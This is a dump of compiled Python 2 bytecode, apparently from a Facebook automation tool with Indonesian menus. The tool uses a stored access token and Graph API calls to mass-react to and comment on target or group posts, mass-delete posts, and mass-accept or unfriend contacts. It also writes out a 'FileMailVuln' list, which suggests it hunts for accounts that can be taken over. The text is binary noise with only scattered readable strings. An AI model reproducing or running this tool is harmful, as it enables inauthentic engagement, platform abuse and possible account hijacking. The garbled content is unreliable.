\x1b[1;92ms2\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mDone \x1b[1;97m....s(\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal \x1b[1;91m: \x1b[1;97msA\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile saved \x1b[1;91m:\x1b[1;97m out/FileMailVuln.txt(!\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R\xf2\x00\x00\x00R\xb0\x00\x00\x00R 
\x00\x00\x00R\x16\x00\x00\x00R\x94\x00\x00\x00R\xa1\x00\x00\x00R\x03\x01\x00\x00R\x04\x01\x00\x00R\x05\x01\x00\x00RT\x00\x00\x00RW\x00\x00\x00RX\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00R\\\x00\x00\x00R\x19\x00\x00\x00R\xda\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00Rg\x00\x00\x00(\x0c\x00\x00\x00t\x05\x00\x00\x00filesR\xf4\x00\x00\x00R\x0b\x01\x00\x00R\xdf\x00\x00\x00R\x06\x01\x00\x00R\t\x01\x00\x00R\xf6\x00\x00\x00R\x0c\x01\x00\x00Rp\x00\x00\x00R\r\x01\x00\x00R\x9d\x00\x00\x00R\x0e\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x01\x01\x00\x00\xdd\x06\x00\x00sp\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\x03\x01\x11\x01\r\x01\x04\x01\r\x01\x05\x01\x0c\x01\x03\x01\x0f\x01\x10\x01\r\x01\x05\x01\n\x01\x0b\x01\x06\x01\x06\x01\n\x01\x0f\x01\t\x01\x15\x01\r\x01\x12\x01\n\x01\r\x01\x0f\x01\x15\x01\x0c\x01\r\x01\x0c\x01\x10\x01\n\x01\x12\x01\x0f\x01\x03\x01\x19\x01\x03\x01\x07\x01\x0c\x01\x11\x01\t\x01\x17\x01\t\x01\x05\x01\x15\x01\x05\x01\n\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xaa\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHd\x0f\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] 
Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s?\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1.\x1b[1;97m Bot Reactions Target Posts=\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2.\x1b[1;97m Bot Reactions Grup Posts;\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3.\x1b[1;97m Bot Komen Target Posts9\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4.\x1b[1;97m Bot Komen Grup Posts6\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5.\x1b[1;97m Mass delete Posts8\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6.\x1b[1;97m Mass accept friends8\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m7.\x1b[1;97m Mass delete friends*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\t\x00\x00\x00bot_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>t\x08\x00\x00\x00menu_bot\x1c\x07\x00\x00s(\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xe7\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xbc\x00|\x00\x00d\x04\x00k\x02\x00r=\x00t\x02\x00\x83\x00\x00\x01n\xa6\x00|\x00\x00d\x05\x00k\x02\x00rS\x00t\x03\x00\x83\x00\x00\x01n\x90\x00|\x00\x00d\x06\x00k\x02\x00ri\x00t\x04\x00\x83\x00\x00\x01nz\x00|\x00\x00d\x07\x00k\x02\x00r\x7f\x00t\x05\x00\x83\x00\x00\x01nd\x00|\x00\x00d\x08\x00k\x02\x00r\x95\x00t\x06\x00\x83\x00\x00\x01nN\x00|\x00\x00d\t\x00k\x02\x00r\xab\x00t\x07\x00\x83\x00\x00\x01n8\x00|\x00\x00d\n\x00k\x02\x00r\xc1\x00t\x08\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x0b\x00k\x02\x00r\xd7\x00t\t\x00\x83\x00\x00
\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] Wrong inputR8\x00\x00\x00R9\x00\x00\x00Rs\x00\x00\x00Rt\x00\x00\x00R\x81\x00\x00\x00R\x82\x00\x00\x00R\x83\x00\x00\x00R:\x00\x00\x00(\n\x00\x00\x00R/\x00\x00\x00R\x10\x01\x00\x00t\n\x00\x00\x00menu_reactt\n\x00\x00\x00grup_reactt\t\x00\x00\x00bot_koment\n\x00\x00\x00grup_koment\n\x00\x00\x00deletepostt\x06\x00\x00\x00acceptt\x08\x00\x00\x00unfriendR+\x00\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00bots(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x10\x01\x00\x002\x07\x00\x00s,\x00\x00\x00\x00\x01\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1. \x1b[1;97mLikes*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2. \x1b[1;97mLoves)\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3. \x1b[1;97mWows*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4. \x1b[1;97mHahas,\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5. 
\x1b[1;97mSadBoys+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6. \x1b[1;97mAngrys*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00react_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x12\x01\x00\x00L\x07\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xf5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00rC\x00d\x05\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\xae\x00|\x00\x00d\x06\x00k\x02\x00r_\x00d\x07\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\x92\x00|\x00\x00d\x08\x00k\x02\x00r{\x00d\t\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nv\x00|\x00\x00d\n\x00k\x02\x00r\x97\x00d\x0b\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nZ\x00|\x00\x00d\x0c\x00k\x02\x00r\xb3\x00d\r\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n>\x00|\x00\x00d\x0e\x00k\x02\x00r\xcf\x00d\x0f\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r\xe5\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00t\x04\x00\x00\x00LIKER9\x00\x00\x00t\x04\x00\x00\x00LOVERs\x00\x00\x00t\x03\x00\x00\x00WOWRt\x00\x00\x00t\x04\x00\x00\x00HAHAR\x81\x00\x00\x00t\x03\x00\x00\x00SADR\x82\x00\x00\x00t\x05\x00\x00\x00ANGRYR:\x00\x00\x00(\x05\x00\x00\x00R/\x00\x00\x00R\x1a\x01\x00\x00t\x04\x00\x00\x00tipet\x05\x00\x00\x00reactR\x11\x01\x00\x00(\x01\x00\x00\x00t\x04\x00\x00\x00aksi(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x1a\x01\x00\x00a\x07\x00\x00s4\x00\x00\x00\x00\x02\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\t\x00d\x08\x00\x83\x01\x00}\x02\x00y\xed\x00t\n\x00j\x0b\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x02\x00\x17d\x0b\x00\x17|\x00\x00\x17\x83\x01\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00j\x0e\x00\x83\x01\x00}\x04\x00t\x0f\x00d\x0c\x00\x83\x01\x00\x01d\r\x00d\x0e\x00\x14GHxo\x00|\x04\x00d\x0f\x00\x19d\x10\x00\x19D]_\x00}\x05\x00|\x05\x00d\x11\x00\x19}\x06\x00t\x10\x00j\x11\x00|\x06\x00\x83\x01\x00\x01t\n\x00j\x12\x00d\t\x00|\x06\x00\x17d\x12\x00\x17t\x13\x00\x17d\x13\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x14\x00|\x06\x00d\x15\x00 
j\x14\x00d\x16\x00d\x17\x00\x83\x02\x00\x17d\x18\x00\x17t\x13\x00\x17GHq\xe4\x00Wd\r\x00d\x0e\x00\x14GHd\x19\x00t\x15\x00t\x16\x00t\x10\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x1a\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01Wn\'\x00\x04t\x18\x00k\n\x00r\xa0\x01\x01\x01\x01d\x1b\x00GHt\t\x00d\x1a\x00\x83\x01\x00\x01t\x17\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID Target \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s\x1b\x00\x00\x00https://graph.facebook.com/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90t\x04\x00\x00\x00feedRl\x00\x00\x00Rj\x00\x00\x00s\x10\x00\x00\x00/reactions?type=s\x0e\x00\x00\x00&access_token=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nt\x01\x00\x00\x00 s\x14\x00\x00\x00... \x1b[1;92m] \x1b[1;97ms\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s\x17\x00\x00\x00\x1b[1;91m[!] 
ID not found(\x19\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R \x00\x00\x00t\x06\x00\x00\x00reaksiR\x94\x00\x00\x00Rh\x00\x00\x00R!\x01\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00R,\x00\x00\x00(\x07\x00\x00\x00R4\x00\x00\x00t\x03\x00\x00\x00idet\x05\x00\x00\x00limitt\x02\x00\x00\x00oht\x02\x00\x00\x00ahRm\x00\x00\x00Ro\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R"\x01\x00\x00\x7f\x07\x00\x00s<\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01%\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xa5\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHd\x0c\x00GHd\r\x00GHd\x0e\x00GHt\t\x00\x83\x00\x00\x01d\x00\x00S(\x0f\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m1. \x1b[1;97mLikes*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m2. \x1b[1;97mLoves)\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m3. \x1b[1;97mWows*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m4. \x1b[1;97mHahas,\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m5. 
\x1b[1;97mSadBoys+\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;92m6. \x1b[1;97mAngrys*\x00\x00\x00\x1b[1;97m\xe2\x95\x91--\x1b[1;91m> \x1b[1;91m0.\x1b[1;97m Backs\x03\x00\x00\x00\xe2\x95\x91(\n\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0c\x00\x00\x00reactg_pilih(\x01\x00\x00\x00R4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\x13\x01\x00\x00\xa0\x07\x00\x00s&\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\xf5\x00\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n\xca\x00|\x00\x00d\x04\x00k\x02\x00rC\x00d\x05\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\xae\x00|\x00\x00d\x06\x00k\x02\x00r_\x00d\x07\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n\x92\x00|\x00\x00d\x08\x00k\x02\x00r{\x00d\t\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nv\x00|\x00\x00d\n\x00k\x02\x00r\x97\x00d\x0b\x00a\x02\x00t\x03\x00\x83\x00\x00\x01nZ\x00|\x00\x00d\x0c\x00k\x02\x00r\xb3\x00d\r\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n>\x00|\x00\x00d\x0e\x00k\x02\x00r\xcf\x00d\x0f\x00a\x02\x00t\x03\x00\x83\x00\x00\x01n"\x00|\x00\x00d\x10\x00k\x02\x00r\xe5\x00t\x04\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00R\x1b\x01\x00\x00R9\x00\x00\x00R\x1c\x01\x00\x00Rs\x00\x00\x00R\x1d\x01\x00\x00Rt\x00\x00\x00R\x1e\x01\x00\x00R\x81\x00\x00\x00R\x1f\x01\x00\x00R\x82\x00\x00\x00R \x01\x00\x00R:\x00\x00\x00(\x05\x00\x00\x00R/\x00\x00\x00R+\x01\x00\x00R!\x01\x00\x00t\x06\x00\x00\x00reactgR\x11\x01\x00\x00(\x01\x00\x00\x00R#\x01\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R+\x01\x00\x00\xb5\x07\x00\x00s4\x00\x00\x00\x00\x02\x0c\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x02\x05\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\r\x02\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00}\x01\x00t\t\x00d\x08\x00\x83\x01\x00}\x02\x00y>\x00t\n\x00j\x0b\x00d\t\x00|\x01\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00j\x0e\x00\x83\x01\x00}\x04\x00d\x0b\x00|\x04\x00d\x0c\x00\x19\x17GHWn\'\x00\x04t\x0f\x00k\n\x00r\xf1\x00\x01\x01\x01d\r\x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x10\x00\x83\x00\x00\x01n\x01\x00Xy\xed\x00t\n\x00j\x0b\x00d\x0f\x00|\x01\x00\x17d\x10\x00\x17|\x02\x00\x17d\x11\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\x0c\x00j\r\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00t\x11\x00d\x12\x00\x83\x01\x00\x01d\x13\x00d\x14\x00\x14GHxo\x00|\x06\x00d\x15\x00\x19d\x16\x00\x19D]_\x00}\x07\x00|\x07\x00d\x17\x00\x19}\x08\x00t\x12\x00j\x13\x00|\x08\x00\x83\x01\x00\x01t\n\x00j\x14\x00d\x18\x00|\x08\x00\x17d\x19\x00\x17t\x15\x00\x17d\n\x00\x17|\x00\x00\x17\x83\x01\x00\x01d\x1a\x00|\x08\x00d\x1b\x00 
j\x16\x00d\x1c\x00d\x1d\x00\x83\x02\x00\x17d\x1e\x00\x17t\x15\x00\x17GHqL\x01Wd\x13\x00d\x14\x00\x14GHd\x1f\x00t\x17\x00t\x18\x00t\x12\x00\x83\x01\x00\x83\x01\x00\x17GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x19\x00\x83\x00\x00\x01Wn\'\x00\x04t\x0f\x00k\n\x00r\x08\x02\x01\x01\x01d \x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x19\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(!\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID Group \x1b[1;91m:\x1b[1;97m s(\x00\x00\x00\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m R0\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s \x00\x00\x00https://graph.facebook.com/v3.0/s\x13\x00\x00\x00?fields=feed.limit(s\x0f\x00\x00\x00)&access_token=s$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90R$\x01\x00\x00Rl\x00\x00\x00Rj\x00\x00\x00s\x1b\x00\x00\x00https://graph.facebook.com/s\x10\x00\x00\x00/reactions?type=s\x0f\x00\x00\x00\x1b[1;92m[\x1b[1;97mi\n\x00\x00\x00s\x01\x00\x00\x00\nR%\x01\x00\x00s\x14\x00\x00\x00... \x1b[1;92m] \x1b[1;97ms\x1f\x00\x00\x00\r\x1b[1;91m[+]\x1b[1;92m Done \x1b[1;97ms\x17\x00\x00\x00\x1b[1;91m[!] 
ID not found(\x1a\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00R,\x00\x00\x00R\x13\x01\x00\x00R \x00\x00\x00t\n\x00\x00\x00reaksigrupR\x94\x00\x00\x00Rh\x00\x00\x00R!\x01\x00\x00R\x16\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\x11\x01\x00\x00(\t\x00\x00\x00R4\x00\x00\x00R\'\x01\x00\x00R(\x01\x00\x00R\'\x00\x00\x00R\xa0\x00\x00\x00R)\x01\x00\x00R*\x01\x00\x00Rm\x00\x00\x00Ro\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R,\x01\x00\x00\xd3\x07\x00\x00sL\x00\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01\x1b\x01\x12\x01\x11\x01\r\x01\x05\x01\n\x01\x0b\x01\x03\x01#\x01\x12\x01\n\x01\t\x01\x15\x01\n\x01\r\x01!\x01%\x01\t\x01\x15\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x08\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xc4\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHd\x07\x00GHt\t\x00d\x08\x00\x83\x01\x00}\x01\x00t\t\x00d\t\x00\x83\x01\x00}\x0